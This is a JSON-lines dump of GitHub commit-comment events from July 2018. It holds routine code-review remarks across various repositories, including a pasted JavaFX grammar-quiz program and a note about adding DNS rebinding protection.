{"id":"8023301363","type":"CommitCommentEvent","actor":{"login":"samfox92"},"repo":{"name":"seanmorris/flashair_uploader"},"payload":{"comment":{"id":29845267,"position":null,"line":null,"path":null,"commit_id":"22b91ee97c3928148e71969b3bd63db41e494851","created_at":"2018-07-26T15:00:37Z","updated_at":"2018-07-26T15:00:37Z","author_association":"NONE","body":"Hi\r\ndid you have a woking lua project that send news files directly to php web server from the flahair in STA mode ?"}},"created_at":"2018-07-26T15:00:37Z"}
{"id":"8023309725","type":"CommitCommentEvent","actor":{"login":"florinionce"},"repo":{"name":"PopaFlorian/Assigment1"},"payload":{"comment":{"id":29845287,"position":112,"line":112,"path":"Index.js","commit_id":"3374cd278b48d815de9462ffe6947dbf0aee840e","created_at":"2018-07-26T15:01:54Z","updated_at":"2018-07-26T15:01:54Z","author_association":"NONE","body":"is this working? "}},"created_at":"2018-07-26T15:01:54Z"}
{"id":"8023326866","type":"CommitCommentEvent","actor":{"login":"ywarnier"},"repo":{"name":"chamilo/chamilo-lms"},"payload":{"comment":{"id":29845330,"position":27,"line":143,"path":"main/course_info/infocours.php","commit_id":"834622f8f6943803a13578504ef732ececa9a3f9","created_at":"2018-07-26T15:04:32Z","updated_at":"2018-07-26T15:04:32Z","author_association":"MEMBER","body":"There's a little issue in your logic here: when you do this, if api_get_configuration_value('allow_teachers_to_classes'), then you essentially hide all other extra fields from the form.\r\nI'm fixing this, but I just wanted to let you know."}},"created_at":"2018-07-26T15:04:32Z"}
{"id":"8023307185","type":"CommitCommentEvent","actor":{"login":"jaxxzer"},"repo":{"name":"bluerobotics/bluerobotics.github.io"},"payload":{"comment":{"id":29845280,"position":null,"line":null,"path":null,"commit_id":"c3da1f211702656c6a4994ae322fc0cd5e4ec2f7","created_at":"2018-07-26T15:01:30Z","updated_at":"2018-07-26T15:01:30Z","author_association":"MEMBER","body":"Failing CI!!"}},"created_at":"2018-07-26T15:01:30Z"}
{"id":"8023308393","type":"CommitCommentEvent","actor":{"login":"Chatpisit777"},"repo":{"name":"domoticz/domoticz"},"payload":{"comment":{"id":29845282,"position":null,"line":null,"path":null,"commit_id":"ed439fea08824d090d7d18da11506f8b0d6a98f3","created_at":"2018-07-26T15:01:41Z","updated_at":"2018-07-26T15:01:41Z","author_association":"NONE","body":"ed439fe"}},"created_at":"2018-07-26T15:01:41Z"}
{"id":"8023314480","type":"CommitCommentEvent","actor":{"login":"florinionce"},"repo":{"name":"PopaFlorian/Assigment1"},"payload":{"comment":{"id":29845296,"position":112,"line":112,"path":"Index.js","commit_id":"3374cd278b48d815de9462ffe6947dbf0aee840e","created_at":"2018-07-26T15:02:37Z","updated_at":"2018-07-26T15:02:37Z","author_association":"NONE","body":"I think it would be better to save the results in a variable and call the `renderMenuItems` function instead of mutating the menu object - this is bad practice."}},"created_at":"2018-07-26T15:02:37Z"}
{"id":"8023338137","type":"CommitCommentEvent","actor":{"login":"Morozov-5F"},"repo":{"name":"vivalavenezuela/practice"},"payload":{"comment":{"id":29845348,"position":28,"line":28,"path":"STM32F4/main.c","commit_id":"c0055e8292acf09839cf68dfb65968d73faba87e","created_at":"2018-07-26T15:06:18Z","updated_at":"2018-07-26T15:06:18Z","author_association":"NONE","body":"Часть отступов в коде сделаны пробелами, часть - табуляциями. Это нехорошо, нужно привести к какому-то общему стилю. "}},"created_at":"2018-07-26T15:06:18Z"}
{"id":"8023338255","type":"CommitCommentEvent","actor":{"login":"cbuijs"},"repo":{"name":"cbuijs/instigator"},"payload":{"comment":{"id":29845349,"position":null,"line":null,"path":null,"commit_id":"314443a652647011d8496f349cd9780448bf7761","created_at":"2018-07-26T15:06:20Z","updated_at":"2018-07-26T15:06:20Z","author_association":"OWNER","body":"DNS Rebinding protection added. Basically when an IP-Address in a response matches the rebinding ranges, it is only allowed if the DNS Server providing the response is in those ranges too."}},"created_at":"2018-07-26T15:06:20Z"}
{"id":"8023318166","type":"CommitCommentEvent","actor":{"login":"florinionce"},"repo":{"name":"PopaFlorian/Assigment1"},"payload":{"comment":{"id":29845305,"position":2,"line":2,"path":"Untitled-1.html","commit_id":"3374cd278b48d815de9462ffe6947dbf0aee840e","created_at":"2018-07-26T15:03:11Z","updated_at":"2018-07-26T15:03:11Z","author_association":"NONE","body":"what is this file?"}},"created_at":"2018-07-26T15:03:11Z"}
{"id":"8023342336","type":"CommitCommentEvent","actor":{"login":"sharkinsspatial"},"repo":{"name":"AnkitaKhurana/oam-admin"},"payload":{"comment":{"id":29845355,"position":32,"line":38,"path":"src/actions/actions.js","commit_id":"19032aa8b9aaf54d2880a5eab9171e55013d3c01","created_at":"2018-07-26T15:06:58Z","updated_at":"2018-07-26T15:06:58Z","author_association":"COLLABORATOR","body":"We may want to consider changing this endpoint to `/users/id` in `oam-api` since the `DELETE` is implicit in the http verb used.  We should also consider using [template literals](https://developer.mozilla.org/en-US/docs/Web/JavaScript/Reference/Template_literals) here instead of the `+` operator."}},"created_at":"2018-07-26T15:06:58Z"}
{"id":"8023343740","type":"CommitCommentEvent","actor":{"login":"andersy005"},"repo":{"name":"Quansight/conda-recipe-cudatoolkit-dev"},"payload":{"comment":{"id":29845366,"position":19,"line":17,"path":"condarecipe9.2/scripts/activate.d/cudatoolkit-dev-activate.sh","commit_id":"eb4d5befd4c9a9a4d67fd77e5b20093bbec5957b","created_at":"2018-07-26T15:07:12Z","updated_at":"2018-07-26T15:07:12Z","author_association":"COLLABORATOR","body":"@scopatz, \r\n\r\nWould the jinja2 template idea be to render jinja2 output to a file during the build process and then extra needed variables such as `$PKG_NAME`, and `$PKG_VERSION` from this file? Am I getting it right? \r\nFor instance, Let's say I have a file `template.txt` that contains\r\n```\r\nPKG_NAME {{ name }}\r\nPKG_VERSION {{ version }}\r\n```\r\n\r\nAnd then during the build process, I render this file like this:\r\n\r\n```python\r\nIn [1]: from jinja2 import Environment, FileSystemLoader\r\n\r\nIn [2]: env = Environment(loader=FileSystemLoader('.'))\r\n\r\nIn [3]: template = env.get_template('template.txt')\r\n\r\nIn [4]: print(template.render(name='cudatoolkit-dev', version='9.2'))\r\nPKG_NAME cudatoolkit-dev\r\nPKG_VERSION 9.2\r\nIn [5]: with open(\"rendered_template.txt\", \"w\") as f:\r\n   ...:     f.write(template.render(name='cudatoolkit-dev', version='9.2'))\r\n```\r\nThen during activate / deactivate I parse this file to get the package name and/or version.\r\nAm I getting it right? "}},"created_at":"2018-07-26T15:07:12Z"}
{"id":"8023348418","type":"CommitCommentEvent","actor":{"login":"redking12"},"repo":{"name":"kuntao-development/android_device_lenovo_kuntao"},"payload":{"comment":{"id":29845388,"position":null,"line":null,"path":null,"commit_id":"bf66db0986d1b32a327be1cc6fd6137e7d74880d","created_at":"2018-07-26T15:07:56Z","updated_at":"2018-07-26T15:07:56Z","author_association":"CONTRIBUTOR","body":"Incorrect authorship"}},"created_at":"2018-07-26T15:07:56Z"}
{"id":"8023342372","type":"CommitCommentEvent","actor":{"login":"pedrote82"},"repo":{"name":"pedrote82/Planets"},"payload":{"comment":{"id":29845357,"position":null,"line":null,"path":null,"commit_id":"f01549fe26bf37584e73d52f08ac622062c0289b","created_at":"2018-07-26T15:06:58Z","updated_at":"2018-07-26T15:06:58Z","author_association":"OWNER","body":"Thanks"}},"created_at":"2018-07-26T15:06:58Z"}
{"id":"8023355230","type":"CommitCommentEvent","actor":{"login":"lvacreare"},"repo":{"name":"creare-com/podpac"},"payload":{"comment":{"id":29845403,"position":null,"line":null,"path":null,"commit_id":"a7a9e92d7b92310ab2fb019d02736d228ca939e2","created_at":"2018-07-26T15:09:00Z","updated_at":"2018-07-26T15:09:00Z","author_association":"COLLABORATOR","body":"@mpu-creare We can have an offline discussion about general practices, but this specific case is moot. I realized that this change is no longer necessary so I can just use master and remove this branch."}},"created_at":"2018-07-26T15:09:00Z"}
{"id":"8023359219","type":"CommitCommentEvent","actor":{"login":"sharkinsspatial"},"repo":{"name":"AnkitaKhurana/oam-admin"},"payload":{"comment":{"id":29845413,"position":13,"line":48,"path":"src/components/Landing.js","commit_id":"19032aa8b9aaf54d2880a5eab9171e55013d3c01","created_at":"2018-07-26T15:09:39Z","updated_at":"2018-07-26T15:09:39Z","author_association":"COLLABORATOR","body":"Let me know if you have questions about this strange destructing and re-assignment.  I find it a bit confusing myself."}},"created_at":"2018-07-26T15:09:39Z"}
{"id":"8023352767","type":"CommitCommentEvent","actor":{"login":"redking12"},"repo":{"name":"kuntao-development/android_device_lenovo_kuntao"},"payload":{"comment":{"id":29845397,"position":null,"line":null,"path":null,"commit_id":"bf66db0986d1b32a327be1cc6fd6137e7d74880d","created_at":"2018-07-26T15:08:37Z","updated_at":"2018-07-26T15:08:37Z","author_association":"CONTRIBUTOR","body":"Correct author https://review.lineageos.org/#/q/owner:dannybaumann%2540web.de+status:open"}},"created_at":"2018-07-26T15:08:37Z"}
{"id":"8023352970","type":"CommitCommentEvent","actor":{"login":"vovkasm"},"repo":{"name":"facebook/react-native"},"payload":{"comment":{"id":29845398,"position":null,"line":null,"path":null,"commit_id":"52a55fd8d106a15c72671475115c2ebe1f3ee57e","created_at":"2018-07-26T15:08:39Z","updated_at":"2018-07-26T15:08:39Z","author_association":"NONE","body":"@hramos Sorry I don't know exactly who to call... What is it? What are that `Build Service <svcscm@fb.com>` doing? Why it commits this shit into react-native repo?"}},"created_at":"2018-07-26T15:08:39Z"}
{"id":"8023366127","type":"CommitCommentEvent","actor":{"login":"davestewart"},"repo":{"name":"davestewart/vuex-pathify"},"payload":{"comment":{"id":29845429,"position":null,"line":null,"path":null,"commit_id":"03079f458afda39a3524816b3f785ae05c9c1762","created_at":"2018-07-26T15:10:45Z","updated_at":"2018-07-26T15:10:45Z","author_association":"OWNER","body":"OK, great spot. I can confirm that's the case. Let me bump and publish\r\n"}},"created_at":"2018-07-26T15:10:45Z"}
{"id":"8023367473","type":"CommitCommentEvent","actor":{"login":"arghyac35"},"repo":{"name":"kuntao-development/android_device_lenovo_kuntao"},"payload":{"comment":{"id":29845434,"position":null,"line":null,"path":null,"commit_id":"bf66db0986d1b32a327be1cc6fd6137e7d74880d","created_at":"2018-07-26T15:10:58Z","updated_at":"2018-07-26T15:10:58Z","author_association":"CONTRIBUTOR","body":"okay, thanks for correcting."}},"created_at":"2018-07-26T15:10:58Z"}
{"id":"8023369110","type":"CommitCommentEvent","actor":{"login":"VojtechVitek"},"repo":{"name":"pressly/lg"},"payload":{"comment":{"id":29845437,"position":4,"line":55,"path":"_example/main.go","commit_id":"83c229277c6898fda2f651b60e3220b312619ae8","created_at":"2018-07-26T15:11:13Z","updated_at":"2018-07-26T15:11:13Z","author_association":"MEMBER","body":"You're right :( I'm gonna revert the PR"}},"created_at":"2018-07-26T15:11:13Z"}
{"id":"8023371707","type":"CommitCommentEvent","actor":{"login":"johncapital1consultants"},"repo":{"name":"tokio-rs/tokio"},"payload":{"comment":{"id":29845445,"position":28,"line":180,"path":"tokio-current-thread/src/lib.rs","commit_id":"1e90e2772071cd3de6e751ebb1abcacbe31e8b1b","created_at":"2018-07-26T15:11:37Z","updated_at":"2018-07-26T15:11:37Z","author_association":"NONE","body":"Pull"}},"created_at":"2018-07-26T15:11:37Z"}
{"id":"8023352970","type":"CommitCommentEvent","actor":{"login":"vovkasm"},"repo":{"name":"facebook/react-native"},"payload":{"comment":{"id":29845398,"position":null,"line":null,"path":null,"commit_id":"52a55fd8d106a15c72671475115c2ebe1f3ee57e","created_at":"2018-07-26T15:08:39Z","updated_at":"2018-07-26T15:08:39Z","author_association":"NONE","body":"@hramos Sorry I don't know exactly who to call... What is it? What are that `Build Service <svcscm@fb.com>` doing? Why it commits this shit into react-native repo?"}},"created_at":"2018-07-26T15:08:39Z"}
{"id":"8023356026","type":"CommitCommentEvent","actor":{"login":"Morozov-5F"},"repo":{"name":"vivalavenezuela/practice"},"payload":{"comment":{"id":29845406,"position":169,"line":169,"path":"STM32F4/main.c","commit_id":"c0055e8292acf09839cf68dfb65968d73faba87e","created_at":"2018-07-26T15:09:08Z","updated_at":"2018-07-26T15:09:08Z","author_association":"NONE","body":"По-хорошему, функция приветствия должна быть в библиотеке, которая реализует основной функционал - цветомузыку. "}},"created_at":"2018-07-26T15:09:08Z"}
{"id":"8023372864","type":"CommitCommentEvent","actor":{"login":"johncapital1consultants"},"repo":{"name":"tokio-rs/tokio"},"payload":{"comment":{"id":29845451,"position":6,"line":46,"path":"tokio-current-thread/src/lib.rs","commit_id":"1e90e2772071cd3de6e751ebb1abcacbe31e8b1b","created_at":"2018-07-26T15:11:49Z","updated_at":"2018-07-26T15:11:49Z","author_association":"NONE","body":"Pull"}},"created_at":"2018-07-26T15:11:49Z"}
{"id":"8023375015","type":"CommitCommentEvent","actor":{"login":"protonspring"},"repo":{"name":"locutus2/Stockfish"},"payload":{"comment":{"id":29845461,"position":null,"line":null,"path":null,"commit_id":"ec17daf195eedc6e8f7e865edc1ac5da60b9a0e0","created_at":"2018-07-26T15:12:10Z","updated_at":"2018-07-26T15:12:10Z","author_association":"NONE","body":"Because this penalty could forseeably be applied to EVERY candidate passer, to me, it would make sense to try lower values as well."}},"created_at":"2018-07-26T15:12:10Z"}
{"id":"8023298844","type":"CommitCommentEvent","actor":{"login":"florinionce"},"repo":{"name":"PopaFlorian/Assigment1"},"payload":{"comment":{"id":29845262,"position":87,"line":87,"path":"Index.html","commit_id":"3374cd278b48d815de9462ffe6947dbf0aee840e","created_at":"2018-07-26T15:00:18Z","updated_at":"2018-07-26T15:00:18Z","author_association":"NONE","body":"remove extra spaces - indent code"}},"created_at":"2018-07-26T15:00:18Z"}
{"id":"8023381811","type":"CommitCommentEvent","actor":{"login":"traherom"},"repo":{"name":"davestewart/vuex-pathify"},"payload":{"comment":{"id":29845477,"position":null,"line":null,"path":null,"commit_id":"03079f458afda39a3524816b3f785ae05c9c1762","created_at":"2018-07-26T15:13:12Z","updated_at":"2018-07-26T15:13:12Z","author_association":"NONE","body":"You're the fastest ever. :)"}},"created_at":"2018-07-26T15:13:12Z"}
{"id":"8023383621","type":"CommitCommentEvent","actor":{"login":"dimaep"},"repo":{"name":"Semihalf/marvell-dpdk"},"payload":{"comment":{"id":29845482,"position":45,"line":413,"path":"drivers/net/lport/rte_eth_lport_pmd.c","commit_id":"8b06a1044d500260bd33a8f3c1792136760e4454","created_at":"2018-07-26T15:13:30Z","updated_at":"2018-07-26T15:13:30Z","author_association":"NONE","body":"Pointer returned by rte_pktmbuf_prepend exactly the same as rte_pktmbuf_mtod, so you can save call\r\nto rte_pktmbuf_mtod"}},"created_at":"2018-07-26T15:13:30Z"}
{"id":"8023387835","type":"CommitCommentEvent","actor":{"login":"nataliabilokur"},"repo":{"name":"nataliabilokur/English-tense-cecker"},"payload":{"comment":{"id":29845496,"position":2,"line":2,"path":"README.md","commit_id":"f6e61ce338ce1876155815fd679ebc9876a36932","created_at":"2018-07-26T15:14:13Z","updated_at":"2018-07-26T15:14:13Z","author_association":"OWNER","body":"import javafx.application.Application;\r\nimport javafx.event.ActionEvent;\r\nimport javafx.event.EventHandler;\r\nimport javafx.geometry.Insets;\r\nimport javafx.geometry.Pos;\r\nimport javafx.scene.Scene;\r\nimport javafx.scene.canvas.Canvas;\r\nimport javafx.scene.canvas.GraphicsContext;\r\nimport javafx.scene.control.Button;\r\nimport javafx.scene.control.Label;\r\nimport javafx.scene.layout.Background;\r\nimport javafx.scene.layout.BackgroundFill;\r\nimport javafx.scene.layout.CornerRadii;\r\nimport javafx.scene.layout.FlowPane;\r\nimport javafx.scene.paint.Color;\r\nimport javafx.stage.Stage;\r\n\r\npublic class Dispatcher extends Application {\r\n\tColor[] col = { Color.BLACK, Color.AQUAMARINE, Color.BLUE, Color.BLUEVIOLET, Color.BROWN, Color.BURLYWOOD,\r\n\t\t\tColor.CHARTREUSE, Color.CORAL, Color.CRIMSON, Color.GOLD, Color.RED, Color.YELLOW, Color.GREEN,\r\n\t\t\tColor.SKYBLUE, Color.WHITE, Color.PURPLE, Color.SANDYBROWN, Color.ROYALBLUE, Color.DARKORCHID,\r\n\t\t\tColor.GREENYELLOW, Color.INDIANRED, Color.BISQUE, Color.SILVER, Color.LIGHTCORAL, Color.MEDIUMSLATEBLUE,\r\n\t\t\tColor.PINK, Color.DARKVIOLET, Color.SPRINGGREEN, Color.HOTPINK, Color.LIGHTBLUE };\r\n\r\n\tLabel response;\r\n\tLabel response2;\r\n\tLabel response3;\r\n\tstatic int n = 0;\r\n\tButton btn1;\r\n\tButton btn2;\r\n\tButton btn3;\r\n\tButton btn4;\r\n\tButton btn5;\r\n\tButton btn6;\r\n\tButton btn7;\r\n\tButton btn8;\r\n\tButton btn9;\r\n\tButton btn10;\r\n\r\n\t@Override\r\n\tpublic void start(Stage primaryStage) {\r\n\r\n\t\tresponse = new Label();\r\n\t\tresponse2 = new Label();\r\n\t\tresponse3 = new Label();\r\n\t\tresponse.setAlignment(Pos.CENTER);\r\n\t\tresponse2.setAlignment(Pos.CENTER);\r\n\t\tresponse3.setAlignment(Pos.CENTER);\r\n\t\tresponse.setText(\r\n\t\t\t\t\"Choose from the sentences which are signed with the same number the one made using the right tense, please :-)\");\r\n\t\tresponse.setTextFill(Color.WHITE);\r\n\t\tresponse2.setTextFill(Color.WHITE);\r\n\t\tresponse3.setTextFill(Color.WHITE);\r\n\t\tbtn1 = new Button(\"1) I have been to Paris three times.                     \");\r\n\t\tbtn1.setOnAction(e -> btn1_click());\r\n\t\tbtn2 = new Button(\"1) I was in Paris three times.                              \");\r\n\t\tbtn2.setOnAction(e -> btn2_click());\r\n\t\tbtn3 = new Button(\"2) The sun rises on the east.                                \");\r\n\t\tbtn3.setOnAction(e -> btn1_click());\r\n\t\tbtn4 = new Button(\"2) The sun is rising on the east.                          \");\r\n\t\tbtn4.setOnAction(e -> btn4_click());\r\n\t\tbtn5 = new Button(\"3) We had supper when he came.                       \");\r\n\t\tbtn5.setOnAction(e -> btn5_click());\r\n\t\tbtn6 = new Button(\"3) We were having supper when he came.         \");\r\n\t\tbtn6.setOnAction(e -> btn1_click());\r\n\t\tbtn7 = new Button(\"4) I will be lying on a beach this time next week.\");\r\n\t\tbtn7.setOnAction(e -> btn1_click());\r\n\t\tbtn8 = new Button(\"4) I will lie on a beach this time next week.        \");\r\n\t\tbtn8.setOnAction(e -> btn8_click());\r\n\t\tbtn9 = new Button(\"5) He always confuses my name.                         \");\r\n\t\tbtn9.setOnAction(e -> btn9_click());\r\n\t\tbtn10 = new Button(\"5) He is always comfusing my name!                  \");\r\n\t\tbtn10.setOnAction(e -> btn1_click());\r\n\t\tbtn1.setAlignment(Pos.TOP_LEFT);\r\n\t\tbtn3.setAlignment(Pos.TOP_LEFT);\r\n\t\tbtn2.setAlignment(Pos.CENTER_RIGHT);\r\n\t\tbtn4.setAlignment(Pos.CENTER_RIGHT);\r\n\t\tbtn5.setAlignment(Pos.TOP_LEFT);\r\n\t\tbtn7.setAlignment(Pos.TOP_LEFT);\r\n\t\tbtn6.setAlignment(Pos.CENTER_RIGHT);\r\n\t\tbtn8.setAlignment(Pos.CENTER_RIGHT);\r\n\t\tbtn9.setAlignment(Pos.TOP_LEFT);\r\n\t\tbtn10.setAlignment(Pos.CENTER_RIGHT);\r\n\t\tFlowPane frame = new FlowPane(10, 60);\r\n\t\tframe.setBackground(new Background(new BackgroundFill(Color.PURPLE, CornerRadii.EMPTY, Insets.EMPTY)));\r\n\t\tframe.getChildren().add(btn1);\r\n\t\tframe.getChildren().add(btn2);\r\n\t\tframe.getChildren().add(btn3);\r\n\t\tframe.getChildren().add(btn4);\r\n\t\tframe.getChildren().add(btn5);\r\n\t\tframe.getChildren().add(btn6);\r\n\t\tframe.getChildren().add(btn7);\r\n\t\tframe.getChildren().add(btn8);\r\n\t\tframe.getChildren().add(btn9);\r\n\t\tframe.getChildren().add(btn10);\r\n\t\tframe.getChildren().add(response);\r\n\t\tframe.getChildren().add(response2);\r\n\t\tframe.getChildren().add(response3);\r\n\r\n\t\tScene scene = new Scene(frame, 1000, 1000);\r\n\t\tCanvas canvas = new Canvas(1000, 1000);\r\n\t\tframe.getChildren().add(canvas);\r\n\t\tGraphicsContext gc = canvas.getGraphicsContext2D();\r\n\t\tprimaryStage.setScene(scene);\r\n\t\tgc.setFill(Color.RED);\r\n\t\tgc.fillOval(700, 80, 500, 500);\r\n\t\tgc.setFill(Color.YELLOW);\r\n\t\tgc.fillOval(750, 129, 450, 450);\r\n\t\tgc.setFill(Color.YELLOWGREEN);\r\n\t\tgc.fillOval(800, 180, 400, 400);\r\n\t\tgc.setFill(Color.BLUE);\r\n\t\tgc.fillOval(850, 230, 350, 350);\r\n\t\tgc.setFill(Color.PURPLE);\r\n\t\tgc.fillOval(900, 280, 300, 300);\r\n\t\tprimaryStage.setTitle(\"E N G L I S H   G R A M M A R\");\r\n\t\tprimaryStage.show();\r\n\r\n\t}\r\n\r\n\tpublic void btn9_click() {\r\n\t\tresponse.setText(\"Your answer is wrong!\");\r\n\t\tresponse.setTextFill(Color.RED);\r\n\t\tresponse2.setText(\"Your score is: \" + n + \"/5\");\r\n\t\tresponse3.setText(\"We can express our concern with 'always' and Present Progressive.  \");\r\n\r\n\t}\r\n\r\n\tpublic void btn8_click() {\r\n\t\tresponse.setText(\"Your answer is wrong!\");\r\n\t\tresponse.setTextFill(Color.RED);\r\n\t\tresponse2.setText(\"Your score is: \" + n + \"/5\");\r\n\t\tresponse3.setText(\"We use Future Progressive with words: 'this time next week/ tomorrow and so on'.  \");\r\n\r\n\t}\r\n\r\n\tpublic void btn5_click() {\r\n\t\tresponse.setText(\"Your answer is wrong!\");\r\n\t\tresponse.setTextFill(Color.RED);\r\n\t\tresponse2.setText(\"Your score is: \" + n + \"/5\");\r\n\t\tresponse3.setText(\"The action in Past Simple interrupts the action in Past Progressive!  \");\r\n\r\n\t}\r\n\r\n\tpublic void btn4_click() {\r\n\t\tresponse.setText(\"Your answer is wrong!\");\r\n\t\tresponse.setTextFill(Color.RED);\r\n\t\tresponse2.setText(\"Your score is: \" + n + \"/5\");\r\n\t\tresponse3.setText(\"Never forget, we use Present Simple speaking about the laws of nature! \");\r\n\r\n\t}\r\n\r\n\tpublic void btn1_click() {\r\n\t\tresponse.setText(\"Your answer is right!\");\r\n\t\tresponse.setTextFill(Color.WHITE);\r\n\t\tn++;\r\n\t\tresponse2.setText(\"Your score is: \" + n + \"/5\");\r\n\t\tif (n == 5) {\r\n\t\t\tresponse.setText(\"Well done!\");\r\n\t\t}\r\n\t}\r\n\r\n\tpublic void btn2_click() {\r\n\t\tresponse.setText(\"Your answer is wrong!\");\r\n\t\tresponse.setTextFill(Color.RED);\r\n\t\tresponse2.setText(\"Your score is: \" + n + \"/5\");\r\n\t\tresponse3.setText(\" We usually use The Present Perfect with the question 'How many times?'\");\r\n\t\t\r\n\t}\r\n\r\n\tpublic static void main(String[] args) {\r\n\t\tlaunch(args);\r\n\r\n\t}\r\n\r\n}\r\n"}},"created_at":"2018-07-26T15:14:13Z"}
{"id":"8023388937","type":"CommitCommentEvent","actor":{"login":"Morozov-5F"},"repo":{"name":"vivalavenezuela/practice"},"payload":{"comment":{"id":29845499,"position":8,"line":8,"path":"STM32F4/main.c","commit_id":"c0055e8292acf09839cf68dfb65968d73faba87e","created_at":"2018-07-26T15:14:23Z","updated_at":"2018-07-26T15:14:23Z","author_association":"NONE","body":"В репозитории нет файла или ссылки, по которой можно получить этот файл."}},"created_at":"2018-07-26T15:14:23Z"}
{"id":"8023389059","type":"CommitCommentEvent","actor":{"login":"nbolton"},"repo":{"name":"symless/synergy-core"},"payload":{"comment":{"id":29845501,"position":null,"line":null,"path":null,"commit_id":"183403ceb781d877a914f0d8fb4c688ba0b719b6","created_at":"2018-07-26T15:14:24Z","updated_at":"2018-07-26T15:14:24Z","author_association":"MEMBER","body":"Kudos @XinyuHou  👍"}},"created_at":"2018-07-26T15:14:24Z"}
{"id":"8023389989","type":"CommitCommentEvent","actor":{"login":"davestewart"},"repo":{"name":"davestewart/vuex-pathify"},"payload":{"comment":{"id":29845503,"position":null,"line":null,"path":null,"commit_id":"03079f458afda39a3524816b3f785ae05c9c1762","created_at":"2018-07-26T15:14:32Z","updated_at":"2018-07-26T15:14:32Z","author_association":"OWNER","body":"This is so weird. I just patched and published, but there's still no return statement in callOne() in the compiled code:\r\n\r\n![image](https://user-images.githubusercontent.com/132681/43271243-ef8847e0-90ee-11e8-9fb1-dd66a7cda006.png)\r\n\r\nThink I may have to check some manual builds then report back 😕 \r\n"}},"created_at":"2018-07-26T15:14:32Z"}
{"id":"8023390924","type":"CommitCommentEvent","actor":{"login":"dimaep"},"repo":{"name":"Semihalf/marvell-dpdk"},"payload":{"comment":{"id":29845507,"position":45,"line":413,"path":"drivers/net/lport/rte_eth_lport_pmd.c","commit_id":"8b06a1044d500260bd33a8f3c1792136760e4454","created_at":"2018-07-26T15:14:40Z","updated_at":"2018-07-26T15:14:40Z","author_association":"NONE","body":"Add warning message here"}},"created_at":"2018-07-26T15:14:40Z"}
{"id":"8023392090","type":"CommitCommentEvent","actor":{"login":"Morozov-5F"},"repo":{"name":"vivalavenezuela/practice"},"payload":{"comment":{"id":29845511,"position":7,"line":7,"path":"STM32F4/main.c","commit_id":"c0055e8292acf09839cf68dfb65968d73faba87e","created_at":"2018-07-26T15:14:49Z","updated_at":"2018-07-26T15:14:49Z","author_association":"NONE","body":"В репозитории нет файла или ссылки, по которой можно получить этот файл."}},"created_at":"2018-07-26T15:14:49Z"}
{"id":"8023392506","type":"CommitCommentEvent","actor":{"login":"F3l1XQu1ll"},"repo":{"name":"F3l1XQu1ll/SimpleMathsTrainer"},"payload":{"comment":{"id":29845514,"position":13,"line":124,"path":"SimpleMathsTrainer2/src/code/Trainer.java","commit_id":"e7d2167a23d3b988bd1f67c782fe7170a3d52c12","created_at":"2018-07-26T15:14:53Z","updated_at":"2018-07-26T15:14:53Z","author_association":"OWNER","body":"Sorry this is no comment. This is to see where the user has the most mistakes."}},"created_at":"2018-07-26T15:14:53Z"}
{"id":"8023393493","type":"CommitCommentEvent","actor":{"login":"Jay-Jay-OPL"},"repo":{"name":"Jay-Jay-OPL/OPL-Daily-Builds"},"payload":{"comment":{"id":29845518,"position":null,"line":null,"path":null,"commit_id":"16e56f41900992eb5b6a65fc522528961e636038","created_at":"2018-07-26T15:15:01Z","updated_at":"2018-07-26T15:15:01Z","author_association":"OWNER","body":"@SP193, okay I just did what you suggested.  Thank you!  This is so much easier now for me!  \r\n\r\nAwesome tip! :)"}},"created_at":"2018-07-26T15:15:01Z"}
{"id":"8023394418","type":"CommitCommentEvent","actor":{"login":"Morozov-5F"},"repo":{"name":"vivalavenezuela/practice"},"payload":{"comment":{"id":29845521,"position":9,"line":9,"path":"STM32F4/main.c","commit_id":"c0055e8292acf09839cf68dfb65968d73faba87e","created_at":"2018-07-26T15:15:08Z","updated_at":"2018-07-26T15:15:08Z","author_association":"NONE","body":"Ну и здесь то же самое. "}},"created_at":"2018-07-26T15:15:08Z"}
{"id":"8023401892","type":"CommitCommentEvent","actor":{"login":"onInstaCheese"},"repo":{"name":"Shesam1/Steam_2018_666"},"payload":{"comment":{"id":29845540,"position":null,"line":null,"path":null,"commit_id":"04b477ae80be77e060d46e35cecddfd0f4f39267","created_at":"2018-07-26T15:16:09Z","updated_at":"2018-07-26T15:16:09Z","author_association":"COLLABORATOR","body":"https://bit.ly/2LqgsKF"}},"created_at":"2018-07-26T15:16:09Z"}
{"id":"8023402239","type":"CommitCommentEvent","actor":{"login":"davestewart"},"repo":{"name":"davestewart/vuex-pathify"},"payload":{"comment":{"id":29845541,"position":null,"line":null,"path":null,"commit_id":"03079f458afda39a3524816b3f785ae05c9c1762","created_at":"2018-07-26T15:16:12Z","updated_at":"2018-07-26T15:16:12Z","author_association":"OWNER","body":"OK, local build is fine. Really not sure what is going on here...\r\n"}},"created_at":"2018-07-26T15:16:12Z"}
{"id":"8023411712","type":"CommitCommentEvent","actor":{"login":"thuytrinh"},"repo":{"name":"Polidea/RxAndroidBle"},"payload":{"comment":{"id":29845569,"position":null,"line":null,"path":null,"commit_id":"4bbd856d1e055b8a90eaaca03f7f9ed6fa7bfdad","created_at":"2018-07-26T15:17:33Z","updated_at":"2018-07-26T15:17:33Z","author_association":"CONTRIBUTOR","body":"@dariuszseweryn It's time for a new stable release?"}},"created_at":"2018-07-26T15:17:33Z"}
{"id":"8023408577","type":"CommitCommentEvent","actor":{"login":"traherom"},"repo":{"name":"davestewart/vuex-pathify"},"payload":{"comment":{"id":29845561,"position":null,"line":null,"path":null,"commit_id":"03079f458afda39a3524816b3f785ae05c9c1762","created_at":"2018-07-26T15:17:05Z","updated_at":"2018-07-26T15:17:05Z","author_association":"NONE","body":"Nothing like a CI bug to ruin a day."}},"created_at":"2018-07-26T15:17:05Z"}
{"id":"8023417196","type":"CommitCommentEvent","actor":{"login":"davestewart"},"repo":{"name":"davestewart/vuex-pathify"},"payload":{"comment":{"id":29845581,"position":null,"line":null,"path":null,"commit_id":"03079f458afda39a3524816b3f785ae05c9c1762","created_at":"2018-07-26T15:18:25Z","updated_at":"2018-07-26T15:18:25Z","author_association":"OWNER","body":"OK, at work at the mo, so will probably have to leave this till the weekend!\r\n\r\nSorry for the inconvenience :("}},"created_at":"2018-07-26T15:18:25Z"}
